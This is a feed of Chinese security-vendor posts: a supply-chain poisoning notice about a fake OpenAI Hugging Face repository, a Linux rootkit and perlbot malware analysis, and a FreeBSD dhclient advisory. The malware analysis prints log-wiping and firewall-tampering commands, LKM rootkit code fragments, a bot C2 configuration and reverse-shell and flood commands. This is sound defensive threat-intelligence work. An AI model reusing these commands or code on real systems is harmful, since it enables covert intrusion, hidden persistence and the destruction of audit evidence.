深信服千里目安全技术中心 https://wechat2rss.xlab.app/feed/027c7f3b98d9d0f2db84513f0cb94f02e9a8a3d7.xml 深信服千里目安全技术中心专注网络安全各技术领域研究及应用,囊括六大技术实验室和一个创新研究院,聚焦国内外漏洞、攻防对抗技术、终端安全、高级威胁、威胁情报等安全技术领域专业研究,最终赋能于产品。 (wechat feed made by @ttttmr https://wechat2rss.xlab.app) (深信服千里目安全技术中心) Tue, 12 May 2026 19:51:55 +0800 Tue, 12 May 2026 19:51:55 +0800 https://wx.qlogo.cn/mmhead/Q3auHgzwzM6v9pQZGUGdAZCYnQOfPE18AiblFC2lNBibSQfnmJR5tHRA/0 深信服千里目安全技术中心 https://wechat2rss.xlab.app/feed/027c7f3b98d9d0f2db84513f0cb94f02e9a8a3d7.xml 【恶意文件通告】关于Hugging Face平台仿冒OpenAI仓库的供应链投毒事件 https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525577&idx=1&sn=5f71c741c56237738ad5c7cf6519a70f 近期,深信服千里目安全技术中心监测到一起围绕Hugging Face平台的开源AI供应链投毒事件。 深瞻情报实验室 2026-05-12 19:51 北京

近期,深信服千里目安全技术中心监测到一起围绕Hugging Face平台的开源AI供应链投毒事件。

安全研究机构HiddenLayer于2026年5月7日披露,攻击者通过typosquatting技术在Hugging Face仿冒OpenAI官方“Privacy Filter”项目,创建恶意仓库Open-OSS/privacy-filter,借助虚假账户刷star冲上平台趋势榜榜首,在被清除前累计下载量约244,000次,最终向受害者部署基于Rust语言开发的Sefirah窃密木马,是开源AI生态历史上规模最大的恶意分发事件之一。

恶意文件概要

事件名称

关于Hugging Face平台仿冒OpenAI仓库的供应链投毒事件

发布时间

2026512

威胁类型

供应链投毒、信息窃取木马

简单描述

攻击者在Hugging Face注册仿冒OpenAI Privacy Filter的恶意仓库Open-OSS/privacy-filter,通过虚假账户刷star冲上趋势榜首,借助loader.py四阶段感染链投递基于RustSefirah信息窃取木马,窃取受害者的浏览器凭据、加密货币钱包、Discord令牌、SSH/FTP/VPN凭证及系统敏感数据。

关键特征

loader.py禁用SSL并解码远程payload;多阶段PowerShell隐藏执行;批处理写入Microsoft Defender排除项;C2域名通过Cloudflare CDN中转隐藏真实基础设施。

事件详述

攻击背景与起因

近期,深信服千里安全技术中心监测到一起 Hugging Face 平台的信任链滥用事件。据 HiddenLayer安全研究团队披露:攻击者在全球最大的开源AI模型托管平台Hugging Face上,创建了名为Open-OSS/privacy-filter的恶意仓库。该仓库利用typosquatting(仿冒拼写/相似命名)技术,冒充OpenAI官方发布的Privacy Filter项目,逐字复制原始项目的Model Card文档,建立高度可信的视觉欺骗。与此同时,攻击者通过自动化脚本批量生成约667个虚假账户对该仓库进行star操作,将其推上Hugging Face平台趋势榜(Trending)榜首位置。

本次事件滥用了开源AI社区中以“项目名称、下载量、点赞数”为核心的隐性信任体系,是一次典型的供应链投毒事件。

影响范围与风险分析

根据HiddenLayer与BleepingComputer的联合披露,本次事件的核心风险并不在于Hugging Face平台代码本身遭篡改,而在于攻击者能够借助开源AI生态的高度开放性,对全球AI开发者、模型工程师及企业研发团队执行近乎“广播式”的恶意软件分发。

  • 受影响范围:恶意仓库在被下架前累计下载量约244,000次,研究人员指出该数字部分可能被人为放大,但仍有相当数量的真实开发者主机被入侵。

  • 暴露数据:浏览器Cookie、保存密码、加密密钥与会话令牌(Chromium与Gecko系)、Discord令牌与本地数据库、加密货币钱包及种子短语、SSH/FTP/VPN凭据及FileZilla配置、本地敏感文件、完整系统信息与多屏截图。

  • 级联风险:受害者多为AI开发者与算法工程师,其主机内通常托管有OpenAI/Anthropic API Key、GitHub/GitLab访问令牌、云厂商凭据、AI模型权重与训练数据集等高价值资产,单台主机失陷即可引发企业级密钥外泄、模型权重盗取乃至云资源接管。

受影响场景

本次事件主要影响在Hugging Face上拉取/下载第三方模型与脚本、并直接在主机本地环境执行的开发者与企业用户,尤其是以下场景:

  • 直接使用git clone或huggingface-cli下载Open-OSS/privacy-filter并在物理机或开发主机执行loader.py;

  • 在AI Notebook、Jupyter环境中以root或管理员权限交互式运行未审计的第三方模型加载脚本;

  • 在缺少代码签名校验与Sandbox隔离的情况下将Hugging Face模型直接集成进CI/CD流水线;

  • 同时在同一主机保存浏览器密码、加密货币钱包、SSH私钥与各类Token的AI开发者;

  • 将下载量、趋势榜排名作为模型可信度评估主要依据的团队。

截至披露时,Hugging Face平台本身的基础设施未发现被入侵,OpenAI官方Privacy Filter项目亦未被篡改,本次受害对象集中在主动从仿冒仓库下载并本地执行恶意代码的终端开发者。

攻击时间线

时间

事件

详细说明

2026/2/16

C2基础设施预

攻击者注册C2域名recargapopular.com,使用TUCOWS.COM作为注册商,并配置Cloudflare名称服务器(deborah/west.ns.cloudflare.com),提前约3个月部署用于后续数据外泄的基础设施。

2026/2 – 2026/5

恶意仓库创建与伪装

攻击者在Hugging Face注册Open-OSS/privacy-filter仓库,逐字复制OpenAI官方Privacy FilterModel Card,植入伪装为AI推理代码的loader.py

2026/2 – 2026/5

虚假账户刷榜推热

通过自动化脚本生成大量虚假账户对仓库执行star操作,约667个账户参与点赞,将恶意仓库人为推上Hugging Face趋势榜榜首位置。

披露前阶段

大规模分发

Trending榜单曝光下,仓库累计下载量约244,000次,多个真实受害者主机被Sefirah窃密木马感染。

2026/5/7

初次披露

HiddenLayer研究人员公开仿冒仓库、loader.pyPowerShell加载链与最终Sefirah载荷的完整分析。

2026/5/9

媒体技术报道

BleepingComputer发布配套技术分析,曝光C2域名recargapopular.com及与npm typosquatting活动的关联。

披露后

下架与扩展溯源

Hugging Face下架Open-OSS/privacy-filter仓库;研究人员进一步发现,该loader基础设施与npm生态中分发WinOS 4.0植入程序的typosquatting活动存在重叠,指向同一跨平台威胁行为体。

技术特征与攻击行为分析

投毒载体与进入方式

本次事件是典型的“开源AI生态typosquatting + 信任语义滥用”。攻击者综合运用以下三层手段进入受害者主机:

  • 名仿冒:通过Open-OSS/privacy-filter等高相似度命名仿冒OpenAI官方Privacy Filter项目,欺骗按关键词检索/复制粘贴使用模型的用户;

  • 内容仿冒:几乎逐字复制原始项目的Model Card文档与项目描述,使README与示例代码具备与官方近乎一致的视觉与语义可信度;

  • 社群信号操纵用自动化生成的约667个虚假账户进行star操作,借助Hugging Face趋势榜的曝光放大作用,使仓库短时间内冲上榜单榜首;

  • 依赖默认行为:受害者按惯例直接执行示例脚本loader.py,攻击链由此打通。

本次攻击充分利用了开源AI生态相较传统软件包生态的两点差异:其一,模型仓库往往包含可执行的预处理/推理脚本,执行边界从“安装”延伸到“加载”;其二,社区对“下载量+点赞数+趋势榜”的依赖远高于代码签名等强校验机制,使得攻击者能够在不投放0day的情况下实现大规模感染。

多阶段感染链与信息收集目标

攻击者构建了四阶段感染链:从看似合法的Python脚本起步,逐级隐藏意图,最终落地基于Rust编译的Sefirah窃密木马。

潜在收集对象包括:

  • 浏览器数据:Chromium/Gecko系浏览器的Cookie、保存密码、加密密钥、浏览历史、会话令牌;

  • 即时通讯:Discord令牌、本地数据库与主密钥;

  • 加密资产:本地加密货币钱包文件、浏览器扩展中的钱包、钱包种子短语与私钥;

  • 远程访问凭据:SSH、FTP、VPN凭据及配置文件(含FileZilla);

  • 开发者凭据:本地保存的API Key、Access Token、配置文件中的明文密钥;

  • 系统信息:完整主机信息、安装软件清单、用户名、多显示器全屏截图。

窃取到的数据经压缩后通过HTTP协议外泄至C2服务器recargapopular[.]com,该域名于2026年2月16日由TUCOWS.COM注册,并通过Cloudflare CDN中转隐藏真实后端。

持久化能力

Sefirah载荷集成了多层反分析机制,仅在确认运行环境为真实受害者主机时才会触发完整恶意行为,显著提高了沙箱与自动化分析的成本:

  • 化环境检测:识别VMware、VirtualBox、QEMU等虚拟机特征;

  • 沙箱检测:识别主流自动化分析沙箱的行为特征与硬件指纹;

  • 调试器检测:检测附加调试器与软件断点;

  • 分析工具检测:识别Wireshark、Procmon等主机进程。

  • 持久化方面:攻击者并未采用经典的注册表Run键或计划任务,而是通过将最终载荷写入Microsoft Defender排除路径,使Sefirah及其后续行为长期免于本机AV扫描,从而在不显著触发用户感知的情况下保留持续执行能力。

解决方案

建议处置流程

针对已下载或执行过Open-OSS/privacy-filter相关代码的开发者及企业用户,建议立即执行如下处置流程:

1. 识别受影响主机:在终端与EDR中检索是否曾从Hugging Face拉取过Open-OSS/privacy-filter,或访问过recargapopular[.]com;

2. 隔离与重装:对疑似受感染主机直接执行重装/重映像,确保loader、PowerShell stager、start.bat与Sefirah主体被彻底清除;

3. 凭据全面轮换:轮换该主机曾保存的浏览器密码、API Key、SSH私钥、云厂商凭据、Git Token、OpenAI/Anthropic等AI服务Key;

4. 会话失效:使所有浏览器会话Token与SSO登录态失效,重置双因素认证种子;

5. 清理本机Defender排除项:检查并删除被start.bat写入的Microsoft Defender排除路径,恢复正常扫描覆盖范围;

6. 日志与外联审计:审查近期出站流量是否存在指向恶意域名;

IOC

recargapopular[.]com

172.67.165.218

104.21.66.235

MITRE ATT&CK:

Tactic

Technique

ID

Application

Resource Development

Acquire Infrastructure: Domains

T1583.001

攻击前3个月注册recargapopular.com,使用Cloudflare中转隐藏后端。

Initial Access

Supply Chain Compromise

T1195

Hugging Face投放仿冒OpenAI Privacy Filter的恶意仓库。

Initial Access

Phishing

T1566

通过命名仿冒与刷榜实施针对AI开发者的社会工程诱导下载。

Execution

Command and Scripting Interpreter: Python

T1059.006

loader.py作为初始执行入口。

Execution

Command and Scripting Interpreter: PowerShell

T1059.001

WindowStyle Hidden隐藏执行下载后阶段命令。

Defense Evasion

Impair Defenses: Disable or Modify Tools

T1562.001

禁用SSL校验;写入Microsoft Defender排除项。

Defense Evasion

Virtualization/Sandbox Evasion: System Checks

T1497.001

VM/沙箱/调试器/分析工具检测,仅在真实主机执行。

Credential Access

Credentials from Password Stores: Web Browsers

T1555.003

提取Chromium/Gecko浏览器保存的密码与令牌。

Credential Access

Unsecured Credentials: Private Keys

T1552.004

采集SSH/VPN/加密钱包私钥与种子短语。

Collection

Screen Capture

T1113

抓取主机多显示器全屏截图。

Exfiltration

Exfiltration Over C2 Channel

T1041

通过HTTP将压缩数据外泄至recargapopular[.]com

参考链接

跳转微信打开

]]> Tue, 12 May 2026 19:51:00 +0800 【恶意文件通告】Linux多功能病毒分析 https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525577&idx=2&sn=f77ac8f1303ea4b3e5b5dc78b8881b71 近期,深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联,该家族是针对Linux平台的威胁行为者,主要针对中国政府机构和企业实体,利用庞大的僵尸网络进行间谍活动。 深瞻情报实验室 2026-05-12 19:51 北京

近期,深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联,该家族是针对Linux平台的威胁行为者,主要针对中国政府机构和企业实体,利用庞大的僵尸网络进行间谍活动。

恶意文件概要

恶意文件名称

Linux多功能病毒分析

发布时间

2026512

威胁类型

Rootkit、后门、DDoS、僵尸网络

简单描述

攻击者通过多个恶意文和开源软件的组合利用实现实现内核Rootkit隐藏、后门部署、僵尸网络搭建和流量代理转发等多种高危害行为。

恶意文件分析

恶意文件描述

近期,深信服千里目安全技术中心监测到一起Linux后门事件、经过深度分析排查发现该事件与UTG-Q-008团伙存在关联,该家族是针对Linux平台的威胁行为者,主要针对中国政府机构和企业实体,利用庞大的僵尸网络进行间谍活动。

恶意文件分析

此次攻击一共发现三个文件,涵盖了代理转发、权限维持、漏洞扫描和利用、DDos、后门等常见的操作。

1.dnsresolve

该样本为SS5 Socks Server Version 3.8.9 - Release 8,是一个开源 SOCKS5 代理服务器软件。使用gcc (GNU) 4.1.2 20080704 (Red Hat 4.1.2-55)进行编译,主要包含了如下功能:

函数名

地址

大小

功能

main

0x4208800

2840

程序入口,参数解析,环境变量处理

S5Core

0x4214096

15470

核心 SOCKS5 代理处理逻辑(最大函数)

S5SetStatic

0x4231088

1371

初始化静态配置默认值

S5LoadConfig

0x4248400

505

加载配置文件并触发模块加载

S5LoadConfData

0x4236512

9924

解析配置文件(auth/proxy/bandwidth/route等)

S5LoadModules

0x4251264

3662

动态加载 .so 模块

S5LoadPeers

0x4236016

496

加载对等节点配置

S5PropagateConfig

0x4246448

1254

向对等节点传播配置

S5ReceiveConfig

0x4247712

678

接收来自主节点的配置

S5MainThread

0x4248976

378

主线程循环,接受连接

S5ServerMake

0x4230320

345

创建监听 socket

S5ServerAccept

0x4230144

168

接受客户端连接

S5MakeDaemon

0x4230672

61

守护进程化(fork→setsid→fork→chdir→umask)

S5UIDSet

0x4230736

177

降权操作(getpwnam→setgid→initgroups→setuid)

DirectoryQuery

0x4254928

3455

LDAP 目录查询认证

DirectoryCheck

0x4258384

514

目录认证检查

S5RadiusAuth

0x4261552

2741

RADIUS 认证

S5RadiusAcct

0x4258912

2633

RADIUS 计费

S5GetIf

0x4234656

710

获取网络接口信息

S5GetRange

0x4233056

255

解析 IP 范围

S5GetNetmask

0x4233312

180

解析网络掩码

S5StrHash

0x4232992

57

字符串哈希

S5Debug* 系列

-

-

调试/日志输出函数

启动流程

1. 初始化默认配置: 监听地址 `0.0.0.0:1080`,运行用户 `nobody`

2. 检查环境变量并覆盖配置(`SS5_SOCKS_USER`, `SS5_SOCKS_PORT`, `SS5_SOCKS_ADDR` 等)

3. 解析命令行参数

4. 加载 `.so` 模块(`S5LoadModules`)

5. 加载配置文件(`S5LoadConfig`)

6. 守护进程化(`S5MakeDaemon`)

7. 降权运行(`S5UIDSet`)

8. 进入主循环(`S5Core` / `S5MainThread`)

2.59a515e28d1515ae

该文件是一个从bash脚本打包的ELF文件,包含了自解压、socks5、内核级Rookit三个组件协同工作。核心函数如下:

函数

地址

功能

sub_402354

0x4203348

初始化对象 (XOR 解码 /proc/self/exe路径)

sub_4046E0

0x4212448

初始化参数解析对象

sub_404A3A

0x4213306

XOR 解码包装 (调用 sub_4059E4, key=0x2E)

sub_474AD0

0x4672208

readlink()系统调用包装— 读取 /proc/self/exe获取自身路径

sub_4743B0

0x4670384

自定义realpath()— 通过 inode 向上爬升目录树解析绝对路径

sub_40E1F0

0x4248016

std::string 子串赋值

sub_404BB2

0x4213682

字符串后缀匹配 (检查文件扩展名)

sub_40D3E0

0x4249568

字符串搜索 (在 shebang 中查找解释器名)

sub_42D0A0

0x4366496

setenv()— 设置环境变量

sub_404EAA

0x4214442

Shell 执行包装 (v63=0)

sub_404F48

0x4214600

Python 执行包装 (v63=1)

sub_404FE6

0x4214758

Perl/Node/Ruby 执行包装 (v63=2,3,4)

sub_405084

0x4214916

PHP/Lua 执行包装 (v63=5,7)

sub_405122

0x4215074

Rscript 执行包装 (v63=6)

sub_46CBE0

0x4639728

核心进程执行— PATH 查找解释器 → execve

文件执行之后从自身解密出需要执行的bash代码,在bash代码中包含了如下几个核心的恶意逻辑:

反取

rm-rf /var/www/html/config.json          # 删除 Web 服务器配置
rm-rf /root/.xmrig.json                  # 删除 XMRig 矿工配置
rm-rf /root/.config/xmrig.json           # 删除 XMRig 备用配置
rm-rf /var/log/messages*                 # ★ 摧毁系统日志
rm-rf /var/log/secure*                   # ★ 摧毁安全审计日志
rm-rf /var/log/auth.log*                 # ★ 摧毁认证日志
rm-rf /var/log/syslog*                   # ★ 摧毁 syslog

摧毁系统审计日志, 使入侵检测和安全分析失效。删除别的挖矿程序配置。

系统调优 + 防火墙规避

提高系统资源上限 (为挖矿优化)

echo"fs.file-max = 2097152" > /etc/sysctl.conf   # 写入内核参数
sysctl -p# 立即生效
ulimit -SHn1024000# 提高进程文件句柄上限

隐藏 iptables 二进制

mv /usr/sbin/tokens /usr/sbin/iptables     # "恢复" iptables (tokens → iptables)
mv /sbin/tokens /sbin/iptables # 同上

脚本假设系统管理员已将 iptables 重命名为 tokens 以阻止恶意软件使用。脚本将其"恢复正常", 然后操纵防火墙规则, 最后再隐藏:

mv /usr/sbin/iptables /usr/sbin/tokens     # 再次隐藏 iptables
mv /sbin/iptables /sbin/tokens

移除已知矿池 C2 的防火墙封锁,脚本搜索并删除针对以下 IP 段的 INPUT DROP 规则:

IP段

提供商

138.68.0.0/16

DigitalOcean

67.207.0.0/16

DigitalOcean

46.101.0.0/16

DigitalOcean

157.245.0.0/16

DigitalOcean

146.190.0.0/16

DigitalOcean

144.126.0.0/16

DigitalOcean

167.172.0.0/16

DigitalOcean

172.104.0.0/16

Linode

172.105.0.0/16

Linode

iptables -L INPUT -v-n | grep <IP> | awk'{print $8}' | xargs -rL1 iptables -D INPUT -j DROP -s

部署 LKM Rootkit (cloud_monitor)

这是最危险的组件。脚本内嵌完整 C 语言内核模块源码, 在目标机器上现场编译并加载。

编译流程

mkdir /tmp/b
# 写入 cloud_monitor.h (宏定义)
# 写入 cloud_monitor.c (约 400 行内核模块代码)
# 写入 Makefile
make-C /lib/modules/`uname -r`/build M=/tmp/b modules
insmod /tmp/b/cloud_monitor.ko
rm-rf /tmp/b     # 清理编译痕迹

被挂钩的系统调用

系统调用

挂钩后行为

getdents

过滤目录列表中的隐藏条目

getdents64

同上 (64位版本)

kill

拦截自定义信号, 实现后门功能

自定义后门信号

信号

编号

功能

SIGINVIS

41

设置进程PF_INVISIBLE标志→ 从 ps/top//proc中隐藏进程

SIGSUPER

54

修改 cred 结构 → 直接获取 root 权限 (uid=0,gid=0,suid=0,...)

SIGMODINVIS

53

从内核模块链表list_del→ 从 lsmod中隐藏自身

文件/目录隐藏:任何以 $hhide (默认 ad12e85f) 为前缀的文件/目录在 ls/find/readdir 中不可见:

#define MAGIC_PREFIX "ad12e85f"
// 在 hacked_getdents 中:
if (memcmp(MAGIC_PREFIXdir->d_namestrlen(MAGIC_PREFIX)) ==0) {
// 从返回结果中移除此条目
}

同时, 以数字命名的进程 ID 也会在 /proc 中被隐藏 (通过 is_invisible 检查 PF_INVISIBLE 标志)。

内存保护绕过

// x86/x86_64: 修改 CR0 寄存器绕过写保护
cr0=read_cr0();
unprotect_memory();   // write_cr0(cr0 & ~0x00010000)
// 修改系统调用表...
protect_memory();     // write_cr0(cr0)
// ARM64: 直接修改页表权限
update_mapping_prot(physvirtsizePAGE_KERNEL);

自隐藏技术

// 从内核模块链表中删除自身
module_hide() {
module_previous=THIS_MODULE->list.prev;
list_del(&THIS_MODULE->list);     // 从 lsmod 不可见
}
// 删除 sect_attrs 防止 sysfs 暴露
tidy() {
kfree(THIS_MODULE->sect_attrs);
THIS_MODULE->sect_attrs=NULL;   // /sys/module/ 不可见
}

Rootkit 元数据

属性

模块名

cloud_monitor(伪装云监控)

许可证

"Dual BSD/GPL" (虚假)

作者

m0nad (开源 LKM rootkit 作者)

描述

"LKM rootkit"

兼容内核

Linux 2.6.18 ~ 5.7+ (支持 x86_64、ARM64)

部署 SS5 SOCKS5 代理

# 从隐藏在 /etc/$hhide/ 的 dnsresolve 复制 SS5 代理
cp /etc/ad12e85f/dnsresolve /$EXE# $EXE = md5sum($RANDOM)[:8]
# 以静默、线程模式启动 SS5 SOCKS5 代理
/$EXE-m-t-p /usr/share/terminfo/w/wy66-qa -b0.0.0.0:$port
# 删除可执行文件 (进程仍在内存中运行)
rm-rf /$EXE
# 通过 rootkit 信号隐藏 SS5 进程
kill-41`cat /usr/share/terminfo/w/wy66-qa`
# 通过 rootkit 信号隐藏内核模块
kill-5310000000

SS5 配置

参数

说明

-m

静默模式 (不输出日志)

-t

线程模式

-p

PID 文件路径 (/usr/share/terminfo/w/wy66-qa)

-b

绑定地址:端口 (0.0.0.0:$port)

默认端口

由脚本$1参数决定

伪装路径

SS5 PID 文件: /usr/share/terminfo/w/wy66-qa (伪装成 terminfo 数据库条目)

SS5 可执行文件: 随机 8 字符 MD5 前缀, 执行后立即删除

SS5 原始文件: /etc/$hhide/dnsresolve (被 rootkit 隐藏)

日志清除收尾

journalctl --vacuum-time=1s    # 清空 systemd journal 日志

3.ssh_host_dsa_key.pub

该文件与59a515e28d1515ae同源不同构建,通过 SSC 自解压编译器投递,嵌入 Perl 脚本 (~46KB) 实现 IRC C2 通信、DDoS 攻击、漏洞扫描、反向 Shell、日志清除等全功能。基于 "LiGhT's Modded perlbot v2" (Sida/Perlbot 变种)。文件名伪装为 SSH 主机密钥 (.pub)。释放的Perl脚本具备以下功能:

C2 配置

my$processo='usr/sbin/httpd';           # 伪装的进程名
my$linas_max='10';                       # 每批输出行数
my$sleep='5';                        # 批次间隔
my$servidor='adam.established.site';    # ★ C2 IRC 服务器
my$porta='80';                       # ★ 端口80
my@adms= ("qwerty","asdfgh1","zxcvbn1","12345");  # 管理员
my@hostauth= ("qwerty");                 # 授权主机
my@canais= ("#ssh");                   # IRC 频道
my$chanpass="@";                        # 频道密码
# 机器人命名格式
$nick="L_${CPU_CORES}_${HOSTNAME}"
$ircname="linux_${CPU_CORES}";           # IRC 用户名
$realname="${HOSTNAME} ${CPU_CORES}";     # 真实名

DDoS 攻击命令

命令

格式

协议

实现

udpflood

!u udpflood <host> <pkt_size> <time>

UDP Raw

socket(SOCK1, PF_INET, SOCK_RAW, 2)+ SOCK_DGRAM

udp

!u udp <host> <port> <pkt_size> <time>

UDP

inet_atonsend()

tcpflood

!u tcpflood <host> <port> <pkt_size> <time>

TCP SYN

1000并发 socket()+connect()+shutdown()

httpflood

!u httpflood <host> <time>

HTTP GET

IO::Socket::INET->new(PeerPort=>80)循环 GET

sqlflood

!u sqlflood <host> <time>

MySQL

IO::Socket::INET->new(PeerPort=>3306)循环连接

syn

!u syn <dstip> <dstport> <time>

TCP SYN

编译的./synC程序 (需先 install-syn)

sudp

!u sudp <host> <port> <refl> <thr> <time>

UDP

编译的./50xC程序 (需先 install-50x)

IRC 洪水命令

命令

目标

方式

!u msgflood <who>

用户

10次 PRIVMSG

!u dunixflood <who>

用户

10次 DUNIX CHAT CTCP

!u ctcpflood <who>

用户

20次 CTCP VERSION+PING

!u noticeflood <who>

用户

10次 NOTICE

!u channelflood

频道

25次 JOIN 随机频道

!u maxiflood <who>

用户

60次 混合 (NOTICE+CTCP+PRIVMSG)

漏洞扫描/攻击命令

命令

功能

!u multiscan <vuln> <dork>

14个搜索引擎联合 Dork → SQL注入批量扫描

!u sql <url> <columns>

URL UNION注入检测

!u sql2 <vuln> <dork> <columns>

Google Dork → 多搜索引擎 → SQL注入

!u portscan <ip>

扫描 70+ 常用端口 (15-55555)

!u nmap <ip> <begin> <end>

指定端口范围扫描

!u autoscan <kw> <url> <script> <interval>

自动化 Web 扫描器

后门/访问命令

命令

功能

!u cback <ip> <port>

反向 Shell → /bin/sh -i重定向到攻击者 ip:port

!u socks5

自动安装 SOCKS5 代理 (下载 mocks + 配置 + 启动)

!u system

显示系统信息nprochostnameuname -auptimepwdid

!u sys

同上 (详细版)

!u sendmail <subj> <from> <to> <msg>

发送邮件 (/usr/sbin/sendmail)

权限提升检测 (unixable)

检查 30+ Linux 内核漏洞的本地提权可能: w00t, brk, ave, elflbl, elfdump, expand_stack, h00lyshit, kdump, km2, krad, krad3, local26, loko, mremap_pte, newlocal, ong_bak, ptrace, ptrace_kmod, ptrace24, pwned, py2, raptor_prctl, prctl3, remap, rip, stackgrow2, uselib24, newsmp, smpracer, loginx, exp.sh, prctl, kmdx, raptor, raptor2

反取证命令

命令

功能

!u logcleaner!u no

删除/var/log/*/var/adm/*apache日志 .bash_history

!u cleartmp!u no

cd /tmp; rm -rf *

IRC 管理命令

命令

功能

!u killme

自杀 (kill -9 <pid>)

!u join <#chan>!u part <#chan>

加入/离开频道

!u reset

断开重新连接

!u nick <name>

更换昵称

!u op/deop/halfop/dehalfop/voice/devoice/owner/deowner <who>

IRC 频道权限管理

!u connect <server> <nick>

连接到其他 IRC 服务器

!u raw <data>

发送原始 IRC 数据

!u eval <code>

直接执行 Perl 代码!

信息/帮助命令

命令

功能

!u version

显示版本→ "LiGhT's Modded perlbot v2"

!u packetstorm

 packetstormsecurity.org 获取最新漏洞

!u milw0rm

 milw0rm.com 获取最新 Exploit

!u extras!u install-syn

 server.perpetual.pw 下载编译 SYN Flood 工具

!u install-50x

从同一服务器下载 50x UDP amplification 工具

!u commands

列出所有可用命令

!u help/ddos/irc/flooding/hacking/news/linuxhelp

分类帮助

攻击攻击全景图

IOCs

1

2

3

4

5

6

7

8

9

URL:

adam.established.site:80

andromeda.covers.de/221/mocks.conf

server.perpetual.pw/syn.c

server.perpetual.pw/50x.c

http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz

MD5

05808c4722b06831246b821d1cbb800c

0320b2342100803a8546a2de877c6b3d

cbcd7afaaf22cb64d4f7f9a3c94c7c18

解决方案

建议处置流程

临时解决方案

# 1. 终止 Bot 进程 (伪装为 httpd!),!!!!需要先查看是为否正常httpd进程在
ps aux | grep httpd | grep-v apache | grep-v nginx | awk'{print $2}' | xargs kill-9
ps aux | grep perl | grep IO::Socket | awk'{print $2}' | xargs kill-9

# 2. 阻止 C2 通信
iptables -A OUTPUT -d adam.established.site -j DROP # 防火墙阻断
echo"0.0.0.0 adam.established.site" >> /etc/hosts # 将域名导向本地
# 3. 卸载模块,如果模块被隐藏, 需要重启到救援模式
rmmod cloud_monitor
# 验证
lsmod | grep cloud_monitor
# 4. 恢复 iptables
mv /usr/sbin/tokens /usr/sbin/iptables
mv /sbin/tokens /sbin/iptables
# 重建防火墙规则
# 5. 清除恶意文件
rm-rf /etc/ad12e85f/
rm-f /usr/share/terminfo/w/wy66-qa
...
# 6. 恢复系统配置
# 检查 /etc/sysctl.conf 是否被篡改
# 检查 ulimit 设置
# 7. 查找并停止 SS5 进程:
# rootkit 可能隐藏进程, 检查网络连接
netstat -tlnp | grep <unknown_listen_port>
ss -tlnp

跳转微信打开

]]> Tue, 12 May 2026 19:51:00 +0800 【漏洞通告】FreeBSD dhclient 远程代码执行(CVE-2026-42511) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525551&idx=1&sn=e0910e9cbc4926fc58dc4fca4045af92 2026年5月9日,深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-42511,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-05-09 18:17 北京

2026年5月9日,深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-42511,漏洞威胁等级:高危。

漏洞名称:

FreeBSD dhclient 远程代码执行(CVE-2026-42511)

组件名称:

FreeBSD

影响范围:

FreeBSD 13.5.* < 13.5-RELEASE-p13
FreeBSD 14.3.* < 14.3-RELEASE-p12
FreeBSD 14.4.* < 14.4-RELEASE-p3
FreeBSD 15.0.* < 15.0-RELEASE-p7

漏洞类型:

命令执行

利用条件:

1、用户认证:无需用户认证

2、前置条件:需要位于同一广播域并响应 DHCP 请求

3、触发方式:远程

综合评价:

<综合评定利用难度>:中等,需要同广播域 DHCP 投毒。

<综合评定威胁等级>:高危,成功后可导致 root 权限远程代码执行。

官方解决方案:

已发布

漏洞分析

组件介绍

FreeBSD 是一个免费、开源的类 Unix 操作系统,以卓越的稳定性、高性能、先进的网络功能、原生 ZFS 文件系统以及轻量级 Jail 容器虚拟化技术而闻名,广泛用于服务器、网络存储和嵌入式设备。

漏洞简介

2026年5月9日,深瞳漏洞实验室监测到一则FreeBSD组件存在命令执行漏洞的信息,漏洞编号:CVE-2026-42511,漏洞威胁等级:高危。

该漏洞源于写入 BOOTP file 字段到租约文件时未转义双引号,攻击者可通过恶意 DHCP 响应注入配置指令。当 dhclient 重新解析租约文件时,恶意指令会被 root 权限运行的 dhclient-script 脚本执行,攻击者只需与目标处于同一广播域并架设恶意DHCP服务器,即可实现远程代码执行并完全控制目标系统。

影响范围

目前受影响的FreeBSD版本:

FreeBSD 13.5.* < 13.5-RELEASE-p13
FreeBSD 14.3.* < 14.3-RELEASE-p12
FreeBSD 14.4.* < 14.4-RELEASE-p3
FreeBSD 15.0.* < 15.0-RELEASE-p7

解决方案

官方修复建议

官方已发布安全补丁,请及时将系统更新至以下修复后的版本或更高版本:
FreeBSD 13.5.* ≥ 13.5-RELEASE-p13
FreeBSD 14.2.* ≥ 14.3-RELEASE-p12
FreeBSD 14.4.* ≥ 14.4-RELEASE-p3
FreeBSD 15.0.* ≥ 15.0-RELEASE-p7
下载地址:
https://www.freebsd.org/security/advisories/FreeBSD-SA-26:12.dhclient.asc

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

风险资产发现

支持对FreeBSD的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0032404。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0032404。

参考链接

时间轴

2026/05/09

深瞳漏洞实验室监测到FreeBSD dhclient 远程代码执行信息。

2026/05/09

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Sat, 09 May 2026 18:17:00 +0800 【漏洞通告】Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525526&idx=1&sn=07ac03abdde556813ff744b9ca642ed8 2026年5月7日,Apache Http Server组件披露内存破坏漏洞,漏洞编号:CVE-2026-23918,漏洞威胁等级:高危。 深瞳漏洞实验室 2026-05-08 16:49 北京

